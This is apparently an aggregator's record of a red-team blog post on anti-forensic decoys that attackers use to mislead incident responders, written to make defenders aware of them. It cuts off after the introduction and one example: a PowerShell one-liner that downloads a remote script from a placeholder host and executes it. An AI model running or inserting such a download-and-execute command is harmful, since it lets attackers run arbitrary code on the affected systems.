One Article Review

Source RedTeam PL
Identifier 1798886
Publication date 2020-01-09 19:05:39 (viewed: 2020-07-09 15:05:43)
Title Deceiving blue teams using anti-forensic techniques
Text
Brief introduction
In this short post I would like to demonstrate one of the techniques used by red teamers and real attackers to set up decoys for blue teamers. Defenders should be aware that they are not alone in setting traps such as honeypots: advanced attackers are also actively looking to fool the blue team (usually the goal is to make analysis more difficult and to keep malicious content operational for a longer period of time).
Headers dependent response
Let's assume that the blue team analyzes an incident and has found that a remote PowerShell payload has been executed:
IEX (New-Object Net.WebClient).DownloadString("https://example.com/payload.ps1")
(
Sent Yes
The article does not seem to have been picked up after its publication.


The article does not seem to have been picked up from an earlier one.